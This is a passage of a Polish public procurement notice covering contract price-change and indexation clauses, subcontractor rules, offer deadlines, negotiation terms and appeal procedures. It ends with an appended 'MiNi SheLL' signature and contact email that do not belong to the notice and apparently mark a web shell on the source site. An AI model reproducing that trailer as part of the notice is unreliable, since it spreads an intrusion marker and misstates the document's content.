przypadku:<br/>	zmiany stawki podatku od towarów i usług;<br/>	zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. 2020.2207 t.j.);<br/>	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu, lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572),<br/>jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>Szczegółowe warunki i zasady wprowadzenia ww. zmian zostały określone w § 5 projektu umowy.<br/>§ 6 ust. 1. Na podstawie art. 439 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza zmianę wynagrodzenia Wykonawcy w przypadku zmiany wysokości wskaźnika cen towarów i usług konsumpcyjnych opublikowanego przez prezesa Głównego Urzędu Statystycznego na stronie internetowej Urzędu:<br/>http://swaid.stat.gov.pl/Ceny_dashboards/Raporty_predefiniowane/RAP_DBD_CEN_2.aspx<br/>z zastrzeżeniem że:<br/>a)	minimalny poziom zmiany wskaźnika, uprawniający strony do żądania zmiany wynagrodzenia wynosi 5% w stosunku do wskaźnika z miesiąca w którym miało miejsce otwarcie ofert,<br/>b) ceny jednostkowe artykułów spożywczych określone w załączniku nr 1 do Umowy mogą być waloryzowane nie częściej niż co 3 miesiące, a pierwsza waloryzacja może nastąpić nie wcześniej niż <br/>6 miesięcy od daty zawarcia Umowy.<br/>Szczegółowe warunki i zasady waloryzacji wynagrodzenia zostały określone w § 6 projektu umowy.<br/>§ 11. ust. 5. Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 w zw. z art. 266 ustawy Pzp, w celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania <br/>o udzielnie zamówienia. Przepis art. 122 ustawy Pzp stosuje się odpowiednio.<br/>§ 11. ust. 6. Zmiana Podwykonawcy przez Wykonawcę wymaga przedstawienia właściwego uzasadnienia przez Wykonawcę i zgody Zamawiającego i może być dokonana w formie pisemnego, pod rygorem nieważności, aneksu do ww. umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-11 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-11 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający ogranicza liczbę wykonawców, których zaprosi do negocjacji do 3 wykonawców spełniających w najwyższym stopniu kryteria oceny ofert. W przypadku gdy liczba wykonawców, którzy złożyli oferty niepodlegające odrzuceniu jest mniejsza niż 3, Zamawiający zaprosi wszystkich wykonawców do negocjacji. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wartość zamówienia uwzględnia prawo opcji. <br/><br/>Z postępowania o udzielenie zamówienia wyklucza się również Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <br/><br/>POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY <br/>1. Środki ochrony prawnej określone w Dziale IX ustawy Pzp przysługują Wykonawcy, uczestnikowi konkursu oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia lub nagrody w konkursie oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy. <br/>2. Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub ogłoszenia o konkursie oraz dokumentów zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 469 pkt 15 ustawy Pzp oraz Rzecznikowi Małych i Średnich Przedsiębiorstw. <br/>3. Środkami ochrony prawnej, o których mowa w pkt 1 są:- odwołanie do Prezesa Krajowej Izby Odwoławczej (art. 513 i nast. ustawy Pzp - skarga do Sądu Okręgowego w Warszawie (art. 579 i nast. ustawy Pzp) <br/>4. Odwołanie przysługuje na: <br/>4.1. niezgodną z przepisami ustawy czynność Zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, o zawarcie umowy ramowej, dynamicznym systemie zakupów, systemie kwalifikowania wykonawców lub konkursie, w tym na projektowane postanowienie umowy; <br/>4.2. zaniechanie czynności w postępowaniu o udzielenie zamówienia, o zawarcie umowy ramowej, dynamicznym systemie zakupów, systemie kwalifikowania wykonawców lub konkursie, do której Zamawiający był obowiązany na podstawie ustawy. <br/>5. Odwołanie wnosi się do Prezesa Izby. Odwołujący przekazuje kopię odwołania Zamawiającemu przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu. <br/>6. Odwołanie wobec treści ogłoszenia lub treści SWZ wnosi się w terminie 5 dni od dnia zamieszczenia dokumentów zamówienia na stronie internetowej. <br/>7. Odwołanie wnosi się w terminie: <br/>7.1. 5 dni od dnia przekazania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana przy użyciu środków komunikacji elektronicznej, <br/>7.2. 10 dni od dnia przekazania informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia, jeżeli informacja została przekazana w sposób inny niż określony w pkt 7.1. <br/>8. Odwołanie w przypadkach innych niż określone w pkt 5 i 6 wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia. <br/>9. Na orzeczenie Izby oraz postanowienie Prezesa Izby, o którym mowa w art. 519 ust. 1 ustawy Pzp, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu. <br/>10. Skargę wnosi się do Sądu Okręgowego w Warszawie - sądu zamówień publicznych, zwanego dalej &#34;sądem zamówień publicznych&#34;. <br/>11. Skargę wnosi się za pośrednictwem Prezesa Izby, w terminie 14 dni od dnia doręczenia orzeczenia Izby lub postanowienia Prezesa Izby, o którym mowa w art. 519 ust. 1 ustawy Pzp, przesyłając jednocześnie jej odpis przeciwnikowi skargi. Złożenie skargi w placówce pocztowej operatora wyznaczonego w rozumieniu ustawy z dnia 23.11.2012 r. - Prawo pocztowe jest równoznaczne z jej wniesieniem. <br/>12. Prezes Izby przekazuje skargę wraz z aktami postępowania odwoławczego do sądu zamówień publicznych w terminie 7 dni od dnia jej otrzymania.

Creat By MiNi SheLL
Email: jattceo@gmail.com